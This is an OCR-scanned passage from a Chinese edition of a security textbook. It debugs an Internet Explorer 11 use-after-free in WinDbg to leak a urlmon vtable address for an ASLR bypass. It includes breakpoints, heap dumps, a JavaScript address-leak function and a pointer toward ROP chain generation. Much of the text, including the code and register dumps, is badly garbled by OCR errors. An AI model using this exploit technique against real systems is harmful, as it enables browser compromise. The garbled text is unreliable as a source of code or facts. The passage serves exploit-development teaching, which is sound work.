要 做 一 些 答 试 并 彻 展 理解。 我们 还 在 屏幕 上 次 加 了 一 个 按钮 ， 用 来 调用 setBs 函 数 ; 
setBs 函 数 只 将 value 属 性 改 成 一 串 B。 也 可 以 使 用 innerHTML， 但 值 因 规范 而 异 。 接 


#2148 高 级 的 Windows 漏洞 攻击 


下 来 再 看 看 eventhandler 函 数 ， 分 析 正 在 创建 的 对 象 。 可 以 看 到 以 下 两 个 新 行 : 

var x = document.createElement ("INPUT"); 

x.setAttribute("type", "range"); 

这 里 只 创建 了 HTML INPUT 元 素 的 对 象 实例 ， 将 类 型 设置 为 range。 在 尝试 蔡 换 

“释放 后 军用 ”中 涉及 的 已 释放 内 存 时 ， 我 们 妾 试 了 多 个 对 象 /元 系 。 其 中 一 些 导致 

能 够 控制 内 存 泄漏 和 其 他 故障 的 结果 。 HTML 对 象 的 创建 导致 分 配 在 隔离 堆 中 结束 。 
这 些 元 系 的 一 些 属 性 导致 在 默认 进程 推 中 分 配 各 种 类 型 。 大 量 的 特性 和 属性 与 
HTML 元 系 相 关 。 考 虑 到 分 配方 式 ， 需 要 投入 大 量 时 间 进 行 反 汇编 和 调试 。 有 时 ， 
有 意识 地 通过 分 配 泄漏 的 一 些 有 用 信息 与 真正 要 评估 的 内 容 无 天 。 这 上 听 起 来 有 些 怪 
异 ， 但 实际 上 ， 已 释放 内 存 可 以 被 与 内 存 分 配 完全 无 天 (或 不 直接 相关 ) 的 动作 获取 。 
在 上 面 的 源 代 码 中 ， 可 看 到 几 条 警告 消息 ， 可 以 连接 到 调试 硕 。 

现在 分 步 查 看 这 个 脚本 在 WinDbg ———— — “le 
中 的 执行 情况 。 通 过 查看 月 尝 期 则 的 让 pT - 
用 堆栈 、 使 用 PageHeap 并 分 析 内 存 块 ， xu plc 
以 及 在 IDA 中 对 MSHTML DLL 3E 47 3 ay pet 


由 - idéd VMwareTray.exe 


mj LFE, 3C ye TE UT E o 首 和 完 在 I 下 11 中 打 由 - 1412 vmtoolsd.exe 


由 - 2316 dllhost.exe 


F trigger with_objecthtml 文 件 。 此 时 将 a ase 
看 到 警告 消息, 指出 “Before Creation of in Siret aas 
Text Area Object Attach and Set lupo ee 
Breakpoints”( 在 创建 textarea 对 象 前 : JE "MU eure 


H- 476 conhost.exe 


TERI 设置 断 点 ) o 此 后 打开 WinDbsg， TA &- 1032 audiodg.exe 


由 - 1844 iexplore.exe 


下 F6 键 以 连接 到 Internet Explorer 进 程 ， gg 1790 iexplore exe 
| — Sot 
如 图 14-9 上 所 示 。 © System order 


注意 , 目前 连接 到 两 个 iexplore.exe ee 
进程 的 底部 。 启 动 下 时 将 打开 一 个 选 a 
项 卡 ， 会 目 动 司 动 两 个 进程 。 在 正 8 Ca 
中 ， 人 微软 将 正 你 护 模 式 下 的 代理 控制 
以 及 巾 负 过 其 他 选项 卡 分 开 ， 用 以 改 
普 用 户 体 验 ， 防 止 因 错误 而 导致 整个 浏 抠 硕 朋 混 ， 并 文 持 目 动 恢复 功能 。 如 采 
打开 第 二 个 选项 卡 ， 将 创建 男 一 个 进程 。 无 论 如 何 ， 在 本 例 中 ， 只 需要 连接 到 
较 少 的 实例 上 。 

连接 后 ， 接 下 来 浴 加 以 下 断 点 : 

bp MSHTML!CTextArea::CreateElement-t0x13 

bp MSHTML!BASICPROPPARAMS::SetStringProperty 

bp MSHTML!CTxtPtr::InsertRange 


图 14.9 ” 按 下 F6 键 以 连接 到 Intermet Explorer 进 程 
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bp MSHTML!CStr:: AlloctOx4f 

bm MSHTML! HeapRealloc<0> 

bp urlmon!CoInternetCreateSecurityManager 
bp ole32!CoTaskMemAlloc-c0x13 


Fri A AED AREA E SS: 


MSHTML'CTextArea::CreateElement-13 ”这 是 为 HeapAlloc 调 用 的 返回 
值 设置 的 。 如 有 果 此 时 分 析 EAX， 将 显示 textarea 对 象 的 地 址 。 
MSHTML!BASICPROPPARAMS::SetStringProperty 如 前 所 述 , 在 “释放 后 
重用 ”涉及 的 对 象 的 调用 链 中 可 看 到 此 函数 。 它 导致 调用 HeapReAlloc 和 可 
能 的 释放 操作 ， 

MSHTML:CTxtPtr:InsertRange 该 函数 会 调用 memcpy， " — tB aJ, 5E 
textarea 对 象 相 关 的 初始 内 存 分 配 复制 到 目的 内 存 ， 显 示 在 浏览 器 屏幕 上 。 
MSHTML!CStr::_Alloc+Ox4f ”使 用 该 断 点 跟踪 一 些 存储 a 字符 串 的 BSTR 分 
配 。 此 后 你 会 看 到 其 中 一 处 或 多 处 分 配 被 释放 ， 重 新 分 配给 对 象 ， 涉 及 “ 释 
WEER” o RRA Mm. MRR- F itest eax, eax 指 令 匹 配 。 

bm MSHTML!_HeapRealloc<0> 之 所 以 使 用 break match (bm) 选 项 ， 是 因为 
图 数 名 包 舍 特殊 字符 。 只 需要 使 用 这 个 断 点 一 次 ， 承 可 以 跟踪 正在 释放 的 
urlmon!CoInternetCreateSecurityManager 这 个 断 点 与 我 们 正在 创建 的 
INPUT 对 象 相关 。 访 函数 将 完成 一 些 分配 工 作 , 存储 我 们 最 终 用 来 经 过 ASLR 
MJE PRIA AST EF o 

ole32!CoTaskMemAlloc+0x13 eG LIK AAEM AAC. nt ee 
分 配 指针 的 返回 时 机 。 分 配 地 址 应 当 与 来 目 此 前 MSHTMLICStr:: Alloc 的 分 
配 匹 配 ， 这 表明 它们 参与 了 “释放 后 重用 ” 


可 以 在 各 个 点 启用 和 禁用 这 些 断 点 ， 以 便 高 效 地 完成 调试 。 接 下 来 执行 bl 命令 
以 列 出 断 点 ， 再 使 用 bd * 将 这 些 断 点 全 部 禁用 ， 用 命令 be 0 1 局 用 断 点 0 和 1。 此 后 按 
下 FS 键 或 输入 g， 告 诉 调试 堪 继 续 执行 。 


0:018» bl 

0 e 6dde62f13 0001 (0001) 0O:**** 

MSHIMLICTextArea: :CreateElement+0xl13 

1 e 6db02cab 0001 (0001) 0:**** 
MSHTML!BASICPROPPARAMS::SetStringProperty 

2 e 6d93bef0 0001 (0001) O:**** MSHTML!CTxtPtr::InsertRange 
3 e 6d8d/174 0001 (0001) O:**** MSHTML!CStr:: AlloctOx4f 
A e 7721fc40 0001 (0001) Ure*** 
urlmon!CoInternetCreateSecurityManager 

2 e 6e0df435 0001 (0001) O:**** MSHTML! HeapRealloc«c0» 

6 e 75bbea5»f 0001 (0001) O:**** ole32!CoTaskMemAl loct0x13 


0:018» bd * 
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0:018> be 0 1 
0:018» g 


设置 了 断 点 ， 而 且 让 IE 11 在 调试 右 中 运行 后 ， 单 击 警告 弹出 窗口 中 的 OK 按钮 ， 
这 将 立即 到 达 MSHTML!ICTextArea::CreateFElement+0x13 处 的 断 点 0: 


Breakpoint 0 hit 

eax=03018300 ebx-00000000 ecx-03170000 edx=011868ca esi-03b3bdc4 
edi-6dde62e0 eip-6dde62f3 esp=03b3bdb0 ebp=03b3bdb0 iopl-0 nv 
up ei pl zr na pe nc cs-0023 ss=002b ds=002b es-002b fs-0053 
gs-002b efl-00000246 
MSHTML!CTextArea::CreateElement-40x13: 

6dde62f3 85c0 test eax,eax 


此 时 ，EAX 中 的 内 存 地 址 0x03018300 存 放 了 创建 后 的 textarea 对 象 。 之 后 ， 局 用 
MSHTMLICTxtPtr::InsertRange 处 的 断 点 2， 以 便 跟踪 从 与 textarea 元 素 相关 的 内 存 分 
配 中 复制 的 字符 串 a。 使 用 be 2 启用 该 断 点 后 ， 按 下 F5 键 两 次 ， 第 二 次 到 达 断 点 2。 
一 旦 到 达 该 断 点 ， 则 按 住 F8 键 以 单 步 执行 ， 直 至 到 达 memcpy 调 用 处 ， 如 下 所 示 : 

0:007» be 2 

0:007» g 


Breakpoint 2 hit 
eax=00000001 ebx-00000039 ecx-03b3bd84 edx-fdef0000 esi-030a80f0 


edi-00000001 eip-6d93bef0 esp-03b3bd44 ebp-03b3be04 iopl=0 nv 
up ei ng nz na pe cy cs-0023 ss=002b ds-002b es-002b fs5-0053 
gs=002b ef1=00000287/ 

MSHTML!CTxtPtr::InsertRange: 

6d93bef0 8bff mov edi,edi 

0:007» g 


Breakpoint 2 hit 

eax-00000269 ebx-00000039 ecx=03b3bd84 edx-00000265 esi-030a80f0 
edi-00000265 eip-6d93bef0 esp-03b3bd44 ebp-03b3be04 iopl=0 nv 
up ei pl nz na pe nc cs-0023 ss=002b ds-002b es=002b fs-0053 
gs=002b ef1=00000206 

MSHTML!CTxtPtr::InsertRange: 

6d93bef0 8bff mov edi,edi 


# Truncated for space. F8 was held until reaching the next instruction: 
0:007» t 

eax-0050dafa ebx-03b3bd84 ecx-000004ca edx-00002000 esi=02fec0d0 
edi-00000072 eip-6d93bf91 esp-03b3bd00 ebp=03b3bd40 iopl-0 nv 
up ei pl nz na pe nc cs-0023 ss=002b ds-002b es=002b fs-0053 
gs=002b efl-00000206 

MSHTML!CTxtPtr: :InsertRange+0x9d: 

6d93bf91 ffl5d001a56e call dword ptr [MSHTML! imp  memcpy s 


可 以 看 到 ， 已 到 达 测 试 中 从 MSTHMLICTxtPtr::InsertRange 回 memcpy s 的 调用 。 
此 时 ，EAX 寄 存 器 中 保存 的 地 址 0x0050dafa 是 将 要 写 入 的 字符 串 a 的 目标 地 址 。 下 面 
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第 川 部 分 


d e DX oui 


0:007» bd 2 
0:007» be 3 
0:007» ba w4 O0050daf8 


的 代码 显示 了 完成 memcpy s 函 数 前 该 地 址 的 内 存 ， 然 后 执行 ga 命令 以 单 步 跳出 函 
数 ， 再 执行 另 一 次 导出 ; 


0:007» dd 0050dafa 


0050dafa 00000000 00000000 00000000 00000000 

0050dbO0a 00000000 00000000 00000000 00000000 

0050dbla 00000000 00000000 00000000 00000000 

0050db2a 00000000 00000000 00000000 00000000 

0050db3a 00000000 00000000 00000000 00000000 

0050db4a 00000000 00000000 00000000 00000000 

0050db5a 00000000 00000000 00000000 00000000 

0050db6a 00000000 00000000 00000000 00000000 

0:007» gu 

eax-00000000 ebx-03b3bd84 ecx=00000000 edx-00000000 esi=02fec0d0 

edi=00000072 eip-6d93bf97 esp-03b3bd00 ebp=03b3bd40 iopl-0 nv 

up ei pl zr na pe nc cs-0023 ss=002b ds-002b es-002b fs5-0053 

gs-002b efl-00000246 

MSHTML!CTxtPtr: :InsertRange+0xa3: 

6d93bf9/7 8b4508 mov eax,dword ptr [ebp+8] 

ss:002b:03b3bd48=3 9000000 

0:007» dc O0050dafa 

0050dafa 00610061 00610061 00610061 00610061 2a.a.a.a.a.a.a.a. 

0050dbO0a 00610061 000610061 00610061 00610061 2a.a.a.a.a.a.a.a. 

0050dbla 00610061 00610061 00610061 00610061 2a.a.a.a.a.a.a.a. 

0050db2a 00610061 00610061 00610061 00610061 2a.a.a.a.a.a.a.a. 

0050db3a 00010061 000610061 00610061 00610061 2a.a.a.a.a.a.a.a. 

0050db4a 00610061 000610061 00610061 00610061 2a.a.a.a.a.a.a.a. 

0050db5a 00610061 00610061 00610061 00610061 2a.a.a.a.a.a.a.a. 

0050dboa 00000061 00000000 00000000 00000000 2a............... 

可 以 看 到 ， 一 串 a 被 复制 到 内 存 中 。 这 是 可 在 浏览 器 窗口 中 看 到 的 一 串 a 的 实际 
地 址 。 发 生 内 存 泄 汤 时 ， 这 将 变 得 十 分 明显 。 接 下 来 蔡 用 断 扣 2， 并 为 


MSHTML!CStr:: Alloct+0Ox43 启 用 断 点 3。 还 需要 为 刚才 写 入 的 那 串 a 的 地 址 设置 break 
on access 汤 点 ， 因 为 这 个 地 址 对 内 存 沪 漏 十 分 午 要 。 需要 从 地 址 0x0050dafa 减 去 两 个 
字 节 ， 从 而 实现 4 字 节 对 齐 。 完 成 这 些 更 改 后 ， 列 出 断 点 以 确认 它们 是 正确 的 。 


0:007» bl 

0 e 6ddeo6o2f3 0001 (0001) 
MSHTML!CTextArea: :CreateElement+0x13 

1 e 6db02cab DUDT (0001) Usss*s 
MSHTML!BASICPROPPARAMS::SetStringProperty 

2 d 6d93bef0 0001 (0001) O:**** MSHTML!CTxtPtr::InsertRange 
3 e 6d8d/17/4 0001 (0001) O:**** MSHTML!CStr:: Alloct0x43 
Ad 7727f£c40 0001 (0001) 0:**** 
urlmon!CoInternetCreateSecurityManager 


Q:***x* 
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2 d 6e0df435 0001 (0001) 
6 d 75bbea»f 0001 (0001) 
1] e Q050daf8 w 4 0001 (0001) 


AY Ar Al EET a aS 27 eBid a FH] EX Hr IK RUÉRBERIFSSESERAETATTS M. 
即 到 达 MSHTMLICStr:: Alloc+43 处 的 断 点 。 不 知 是 什么 原因 ， 虽 将 断 点 放 入 +4f， 
但 却 显 示 +43 。 暂 时 不 必 理 会 这 一 点 ,因为 仍然 是 在 test eax, eax 指 令 的 适当 位 置 中 新 。 
现在 记录 EAX 中 的 0x04ec71b8 地 址 ， 此 处 也 将 存储 稍 后 显示 的 一 串 a。 执行 gu 一 段 时 
间 后 ， 将 在 该 地 址 显示 一 串 a。 这 个 块 地 址 十 分 重要 ，eventhandler 函 数 将 很 快 对 其 
进行 重新 分 配 。 

Breakpoint 3 hit 

eax=04ec71b8 ebx=03018344 ecx=00420000 edx=00427920 esi=00000000 


edi=00000039 eip=6d8d7174 esp=03b3c184 ebp=03b3c198 iopl-0 
ss=002b ds=002b es-002b fs=0053 


QO:**** MSHTML! HeapRealloc«0» 
Q:**** ole3?!CoTaskMemAlloc+0x13 
Qi **k** 


nv 
up ei pl zr na pe nc cs=0023 
gs=002b efl-00000246 
MSHTML!CStr:: Alloct0x43: 
6d8d/1/74 85c0 test eax, eax 

0:007» gu # Executed a couple of times until the address in EAX held our a's 
0:007» dc 04ec71b8 


04ec/1b8 00000072 00610061 00610061 00610061 r...a.a.a.a.a.a. 
04ec/1c8 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a. 
04ec/71d8 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a. 
04ec/1e8 006100061 00610061 00610061 00610061 a.a.a.a.a.a.a.a. 
04ec/1f8 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a. 
04ec/7208 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a. 
04ec/218 006100061 000610061 00610061 00610061 a.a.a.a.a.a.a.a. 
04ec/228 00610061 00000061 0892blal 80000000 a.a.a........... 


另外 注意 由 CStr: AlloctfAfg INA FEA Bos 2L 2m TN 13: 


mov 
call 


ecx, g hProcessHeap ; hHeap 
?2?25HeapAlloc8$0AQGMemoryProtection 


分 配 正在 使 用 进程 堆 ， 跟 踪 执 行 显示 MemGC 并 未 保护 分 配 。 接 下 来 继续 在 调 


Breakpoint 3 hit 
eax-04ec74b8 ebx-0301834c ecx-00420000 edx-00427920 esi-00000000 


edi=00000039 eip-6d8d7174 esp-03b37ff0 ebp=03b38004 iopl-0 


up ei pl zr na pe nc cs-0023 ss=002b ds-002b es=002b fs-0053 


gs-002b efl1-00000246 
MSHTML!CStr:: Alloct0x43: 
6d8d/174 85c0 test eax,eax 


试 器 中 执行 ， 将 再 次 立即 到 达 MSHTMLICStr:: Alloct43 处 的 断 点 ; 


nv 


我 们 记 下 EAX 中 存储 的 地 址 x04ec74b8, 它 与 之 前 到 达 这 个 断 点 的 信息 以 及 源 代 


码 相 关 。 接 下 来 禁用 上 断 点 3 并 继续 执行 。 此 后 到 达 MSHTMLIBASICPROPPARAMS:: 


303 


第 川 部 分 dm Gb DX ou 


SetStringProperty 处 的 断 点 ， 这 发 生 在 由 formreset0 状 态 变 化 触及 的 eventhandler 函 
BUF: 


0:007> bd 3 

0:007> g 

Breakpoint 1 hit 

eax-00000000 ebx=03018300 ecx=6d996258 edx-04ed48ac esi-00000000 
edi-6d996244 eip-6db02cab esp=03b39d14 ebp=03b39d3c iopl-0 nv 
up ei pl zr na pe nc cs-0023 ss=002b ds-002b es-002b fs=0053 
gs-002b efl-00000246 
MSHTML!BASICPROPPARAMS::SetStringProperty: 

6db02cab 8bff mov edi,edi 


这 正好 在 将 textarea 的 默认 值 设置 为 foo 之 前 。 现 在 启用 MSHTML! HeapRealloc<0> 


处 的 断 点 。 当 调整 MSHTMLICStr:: Alloc 分 配 的 初始 块 大 小 并 调用 realloc 时 , 执行 将 
暂停 。 


0:007» be 5 

0:007» g 

Breakpoint 5 hit 

eax-04ec71bc ebx-04ed48ac ecx-03b39c8c edx-0000000c esi=03018344 
edi-00000003 eip-6e0df435 esp-03b39c74 ebp=03b39c94 iopl=0 nv 
up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs-0053 
gs=002b efl-00000206 

MSHTML! HeapRealloc<0>: 

6e0df435 8bff mov edi,edi 

0:0007» bd 5 


可 以 看 到 ，EAX 保 存 了 地 址 0x04ec71bc， 这 与 从 MSHTMLICStr:: Alloc R EEN 


初始 块 的 地 址 相同 。 实 际 差 儿 个 字 节 ， 但 这 是 由 于 对 齐 造成 的 。 在 按 下 F8 键 几 秘 后 ， 
将 显示 下 面 的 输出 ， 在 到 达 对 memmove 的 调用 时 执行 分 止 。 
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0:007» t 

eax-0000000c ebx-0047fb88 ecx-0000000c edx=00427920 esi=04ec71b8 
edi-0047fb88 eip=777d898e esp=03b39a98 ebp-03b39aa0 iopl-0 nv 
up ei ng nz na po cy cs-0023 ss=002b ds=002b es-002b fs-0053 
qs-002b ef1-00000283 

ntdll!memmove+Oxe: 

777d898e 8bc1 mov eax,ecx 


memmove 函 数 中 有 几 条 指令 ， 将 源 和 目的 地 参数 加 载 到 ESI 和 EDI 中 。EDI 中 是 


最 终 设置 为 foo 的 重新 调整 块 大 小 的 目标 地 址 。ESI 包 含 刚 才 在 realloc 调 用 中 看 到 的 
块 地 址 。 下 面 使 用 !heap 命 令 检 查 进一步 操纵 前 源 块 的 状态 ， 在 单 步 跳 出 这 些 函数 调 
用 时 再 次 检查 : 


0:007» !heap -p -a 04ec71b8 
address 04ec71b8 found in 
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 HEAP @ 420000 
HEAP ENTRY Size Prev Flags UserPtr UserSize - state 
O4ec71b0 0010 0000 [00] 04ec71b8 00078 - (busy) 
0:007» gu 
0:007» qu 
0:007» theap -p -a 04ec71b8 
address 04ec71b8 found in 
 HEAP @ 420000 
HEAP ENTRY Size Prev Flags UserPtr UserSize - state 
O4ec71b0 0010 0000 [00] 04ec71b8 00078 - (free) 


可 以 看 到 ， 该 块 己 经 释放 ， 可 供 重 新 分 配 。 如 末 跟 踪 从 MSHTMLICStr:: Alloc 
函数 分 配 的 其 他 块 ， 会 发 现 不 同 的 点 也 在 杰 放 它 。 可 通过 局 用 urlmon!CoInternet- 
CreateSecurityManager 上 的 断 点 来 继续 : 


0:007» be 4 

0:007» g 

Breakpoint 4 hit 

eax-03b38f70 ebx=03010500 ecx=00000000 edx-0000000b esi=6d8471b4 
edi=030bae5c eip-7727fc40 esp-03b38f48 ebp-03b38f7c iopl-0 nv 
up ei pl zr na pe nc cs-0023 ss=002b ds=002b es-002b fs-0053 
gs=002b efl-00000246 
urlmon!CoInternetCreateSecurityManager: 

TI27£cA0 8bff mov edi,edi 


由 于 在 释放 前 一 对 象 后 创建 了 该 对 象 ， 并 将 类 型 设置 为 range， 因 此 测试 到 达 了 
这 个 断 点 。 现 在 , 必须 启用 ole32!CoTaskMemAlloc+0x13 处 的 断 点 来 跟踪 用 于 分 配 的 
地 址 : 


0:007> be 6 

0:007» g 

Breakpoint 6 hit 

eax-04ec71b8 ebx-03010500 ecx-777ce40c edx=00427920 esi=6d8471b4 
edi-030bae5c eip-75bbeab5f esp-03b38f20 ebp-03b38f20 iopl-0 nv 
up ei pl zr na pe nc cs-0023 ss=002b ds=002b es=002b fs-0053 
qs-002b ef1=00000246 

ole32!CoTaskMemAl1loc+0x13: 

/5bbea5ft bd pop ebp 

0:007» bd 6 


EAX'H RIBIERA ERTI AA. eS ARERR. IE SA, 
FAD DRL LSPA Aa PARE Hh: 


0:007» dd 04ec71b8 

04ec71b8 000000e2 00610061 00610061 000610061 
04ec71c8 00610061 00610061 00610061 000610061 
04ec/1d8 00610061 00610061 00610061 000610061 
O4ec/1le8 00610061 00610061 00610061 000610061 
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04ec71f8 
04ec7208 
04ec 7218 
04ec7228 


je e DX oui 


00610061 
00610061 
00610061 
00610061 


00610061 
00610061 
00610061 
00000061 


00610061 
00610061 
00610061 
0892b1al 


006160061 
00610061 
006160061 
8e000000 


0:007» gu 
0:007» gu 


0:007» dd 04ec71b8 


04ec71b8 
04ec71c8 
04ec/1d8 
04ec71e8 
04ec71f8 
O4ec/208 
O4ec/218 
04ec7228 


1125442c 
00000001 
00000000 
00000000 
00000000 
00000000 
11254530 
00000000 


11254504 
00000001 
00000000 
00000000 
00000000 
00000000 
00493760 
00000061 


772544d4 
04ec/lc4 
00000000 
11254530 
00000000 
00000001 
00000000 
0892b1lal 


11254514 
00000000 
00000000 
00493760 
11254530 
00000000 
00000000 
8e000000 


分 析 块 顶部 的 地 址 : 0x7725442c. 0x77254504. 0x772544d4110x77254514. TE 
这 些 地 址 上 运行 dt 命令 以 进行 分 析 : 


0:007» dt poi(04ec71b8) 
CSecurityManager:: vftable' 
Symbol not found. 

0:007» dt poi(04ec71b8-4) 
CSecurityManager:: vftable' 
Symbol not found. 

0:007» dt poi(04ec71b8-8) 
CSecurityManager:: vftable' 
Symbol not found. 

0:007» dt poi (04ec71b8+c) 
CSecurityManager::CPrivUnknown:: vftable' 


己 经 编写 了 指向 各 个 CSecurityManager 虚 函数 表 的 指针 ， 以 及 指向 
CSecurityManager::CPrivUnknown 表 的 指针 。 下 面 继续 执行 ， 可 以 看 到 写 入 其 他 位 置 
的 相同 VTable 信 息 : 

Breakpoint 7 hit 

eax-00000045 ebx-03b39cc4 ecx-0000001c edx-00000000 esi-04ec71b8 


edi-0050dafa eip-754a9d7d esp-03b39bc4 ebp=03b39bcc iopl-0 
ss=002b ds=002b es-002b fs-0053 


nv 
up ei pl nz na po nc cs-0023 
gs=002b ef1=00000202 
msvcrt !memcpy+Oxd3: 
/54a9d/d 83c602 


add esi,2 
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0:007» dd edi 


0050dafa 
0050db0a 
0050dbla 
0050db2a 
0050db3a 
0050db4a 


fdef4504 
006100061 
00610061 
00610061 
00610061 
00610061 


00610061 
00610061 
00610061 
00610061 
00610061 
00610061 


00610061 
00610061 
00610061 
00610061 
00610061 
00610061 


00610061 
00610061 
00610061 
006160061 
00610061 
00610061 
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0050db5a 00610061 00610061 00610061 000610061 
0050db6a fdef0061 fdeffdef fdeffdef O000afdef 


注意 我 们 到 达 了 前 面 创建 的 break on access i, RIEA — ram AXI Vs. 
器 用 户 界 面 的 可 视窗 口 。 在 这 个 断 点 处 ， 地 址 是 0x0050dafa， 存 储 在 EDI 寄 存 器 中 。 


ESI ff a? — H— ELA E HJreallocUs FH EWCA R. hk, oA 
A GBA JC BI 53 o ERAT ZEER B ]memepy. E.) SEX P wra E E AEA A 


容 ,， 节 终 得 到 上 面 的 输出 。 输 入 gu, 和 单 步 跳出 最 后 的 memcpy 调 用 后 ,得 到 以 下 结 采 : 


0:005» dd O0050daf8 


0050daf8 
0050db08 
0050db18 
0050db28 
0050db38 
0050db48 
0050db58 
0050db68 


4504fdef 
00610061 
00610061 
00610061 
00610061 
00610061 
00610061 
00610061 


44d471725 


00610061 
00610061 
00610061 
00610061 
00610061 
00610061 
fdeffdef 


45147725 
00610061 
00610061 
00610061 
00610061 
00610061 
00610061 
fdeffdef 


Liruris3 


00610061 
006160061 
006160061 
00610061 
006160061 
006160061 
fdeffdef 


LEAL. FRA Ai d Bd LA PERAR, "lÉl4-10Pfn. 


ZEE EE EÍDaaaanaaaaaaaaaaaaaaaaanaaaBaaaaaaaaaaaaaaaBaaaaaaaa 


| | Replace Text With B's 


图 14-10 ”浏览 器 窗口 中 显示 的 结果 


从 Unicode 转 换 VTable 地 址 时 ， 显 示 的 结果 是 中 文字 人 符 ， 但 测试 团队 知 记 这 
些 中 文字 符 的 真实 含义 ! 最 后 ， 进 行 验证 ， 单 击 Replace Text With B’s 按 钮 ， 将 
到 达 上 断 点 : 


Breakpoint 7 hit 
eax=00000042 ebx-03b398ec ecx-00000034 edx-00000000 esi=04ed7e68 
edi-0050dafa eip-754a9d74 esp-03b397ec ebp=03b397f4 1opl-0 nv 


up ei pl zr na pe nc cs-0023 ss=002b ds-002b es-002b fs=0053 


gs=002b efl-00000246 
msvcrt !memcpy+t+Oxca: 
/54a9d/4 8a4601 mov al,byte ptr [esitl] 


ds:002b:04ed/e69=00 
0:005» dd O0050daf8 


0050daf8 
0050db08 
0050db18 
0050db28 
0050db38 
0050db48 


4504fdef 
00610061 
00610061 
00610061 
00610061 
00610061 


44d471725 
00610061 
00610061 
00610061 
00610061 
00610061 


45147725 
00610061 
00610061 
00610061 
00610061 
00610061 


Litaliza 
00610061 
00610061 
006160061 
00610061 
00610061 
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308 


这 个 地 址 。 


html 


可 以 看 到 , MAA RM 
显示 它 并 未 改变 ， 此 后 执行 gu 以 进行 另 一 次 导出 ， 可 以 看 到 ,字符 串 B 已 经 写 入 
Be BERSIEUAS HR. 


i A a 


SR AE EE 


第 山 部 分 漏洞 攻击 
0050db58 00610061 00610061 00610061 00610061 
0050db68 00610061 fdeffdef fdeffdef fdeffdef 
0:005» gu 
0:007» dc 0050daf8 
0050daf8 0042fdef 00420042 00420042 00420042 ..B.B.B.B.B.B.B. 
0050db08 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B. 
0050db18 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B. 
0050db28 00420042 00420042 00610061 00610061 B.B.B.B.a.a.a.a. 
0050db38 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a. 
0050db48 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a. 
0050db58 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a. 
0050db68 00610061 fdeffdef fdeffdef fdeffdef a.a............. 


告 按钮 到 达 了 断 点 。 导 出 该 断 点 处 的 内 存 ， 


PC (B CAUsers\student\Desktop\t... X 


图 14-11 Nias oO PHAR 
EN igs PRM, CASE ON 14-12 HAS RK. 


laaaaaaaaaaaaaagaaaaaaanaasaaaanaaaasasnaaaasaaaaaaaac/textarea- 


body 


form&form 


textareafttextarea 


图 14-12 ”检测 元 素 


EU DOM Explorer Console Debugger Network UI Responsiveness Profiler Memory Emulation 
w B^ 
4 <body onload="run()"> A 
4 <form id="form"> 
<!-- «textarea id="textarea" colsz"B0"»aaaaaaaaaaaaaaaaanaaaaaaac/textarea^ --> 
b <script>...</script> 
¿textarea id="textarea" cols="80 HE ELE EL V 


需要 获取 屏幕 上 所 显示 字符 的 Unicode,， 将 其 转换 为 十 六 进 制 ,确认 它 是 售 符 合 
预期 。 前 面 已经 确认 和 跟踪 了 内 存 泄漏 菊 陷 ， 现 在 对 其 进行 武 厚 化 ! 


14.6.3 AGARRE 


前 化 
现在 需要 湛 加 一 些 JavaScript 代 人 码 行 ， 以 便利 用 泄漏 的 地 址 。 痛 先 要 确认 能 够 成 
功 地 访问 Unicode， 并 能 将 其 转换 为 十 六 进 制 。 此 后 需要 找到 RVA 偏 移 ， 从 泄漏 地 址 
减 去 RVA 偏 移 ， 得 到 基地 址 。 此 后 ， 可 使 用 corelanc0d3r 有 的 mona.py( 或 Sascha Schirra 
的 Ropper 工 具 )， 基 于 RVA 偏 移 生 成 ROP 链 。 


下 次 运行 将 使 用 Leaked_urlmon.html 文 件 。 首 先 添加 用 于 转换 泄漏 地 址 的 
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printLeak Pf Zi: 
function printLeak() { 
var text = document.getElementById("textarea"); 
//Getting swapped element 
var leak = text.value.substring(0,2); // Grabbing index[0:2] 


var hex = parseInt(leak.charCodeAt (1) .toString(16) 
// Line wrapped 
+ leak.chartCodeAt().toSEring(lo6), 16); 
// parselnt( leak.charCodeAt (1) .toString (16) 
// + leak.charCodeAt (0) .toString(16), 16 ) 
// Above line lifted on April 20th, 2017 from: 
/* https://github.com/rapid7/metasploit-framework/blob/master/ 
modules/exploits/windows/browser/ms13 037 svg dashstyle.rb*/ 
text.value = "Leaked address: Ox"t+thex.toString (16) 
// Line wrapped 
+ " —- urlmon!CSecurityManager:: vftable'"; 


} 
下 面 逐 一 分 析 每 行 。 先 看 第 一 行 : 
var text = document.getElementById("textarea"); 


这 一 行 基于 ID 获取 textarea 元 素 ， 赋 给 变量 text。 在 第 二 行 创 建 一 个 leak 变 量 ， 并 
访问 页 面 上 显示 的 前 两 个 Unicode 字 符 : 


var leak = text.value.substring (0,2); 


WAG BU SB AS FE “BE”. 现在 使 用 在 线 转换 器 ， 显 示 这 个 字符 的 十 六 进 
制 值 。 可 从 https://unicodelookup.com 获 得 此 转换 右 。 结 果 如 图 14-13 所 示 。 


| https;//unicodelookup.com/* &/1 


Unicode Lookup > 


Unicode character — Oct Dec Hex HTML “出 Introduction 
Bama) ior Unicode Lookup is an online reference 
EZ ejk unified ideographs extension a u+04504 042404 17668  0x4504  &*17668, tool to lookup Unicode and HTML 
special characters, by name and 


! number, and convert between their 
[« [> decimal, hexadecimal, and octal 
bases. 


图 14-13 ”显示 十 六 进 制 值 


可 以 看 到 ， 十 六 进 制 值 是 0x4504。 转 换 两 个 字符 “ 莹 ”和 “此 ” 可 在 Unicode 
Lookup 中 看 到 如 图 14-14 所 示 的 内 容 。 
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https;//unicodelookup.com/* & & /1 


Unicode Lookup 2# 


Unicode character 
Results 1-2 of 2 


Oct Dec Hex HTML Introduction 
Unicode Lookup is an online reference | 


cjk unified ideographs extension a u*04504 042404 17668  0x4504 &#17668; tool to lookup Unicode and HTML 


cjk unified ideograph 7725 


073445 30501  0x7725 — &$€30501; special characters, by name and à 
decimal, hexadecimal, and octal 
> bases. 


图 14-14 ”转换 两 个 字符 


这 两 个 字符 的 十 六 进 制 值 连接 起 来 古 0x77254504。 在 竺 局 系统 以 及 DLL 基 
